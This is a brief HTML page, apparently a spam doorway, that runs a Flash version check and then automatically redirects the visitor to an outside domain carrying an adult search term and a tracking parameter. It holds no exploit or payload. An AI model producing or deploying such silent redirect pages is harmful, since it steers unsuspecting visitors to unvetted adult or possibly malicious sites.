<html>
<head>
<title></title>
</head>
<body>

	<SCRIPT LANGUAGE="JavaScript" SRC="getFlashVersion.js" TYPE='text/javascript'></SCRIPT>

	<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
	<!--

	// Call Function from getFlashVersion.js
	var temp = getFlashVersion();
	var flashVersion = 6;

	if (temp >= flashVersion)
	{
		document.writeln('<CENTER><FONT face="arial" color="#aaaaaa" size="1">Macromedia Flash ' + temp + ' Detected</FONT></CENTER>');
		this.document.location.replace("HTTP://gingersteraty.com/in.php?n=405&q=exhibitionism pictures?flash=true");
	}
	else
	{
		document.writeln('<CENTER><FONT face="arial" color="#aaaaaa" size="1">Macromedia Flash ' + flashVersion + ' Not Detected...</FONT></CENTER>');
		this.document.location.replace("HTTP://gingersteraty.com/in.php?n=405&q=exhibitionism pictures?flash=false");
	}
	
	//-->
	</SCRIPT>

</body>
</html>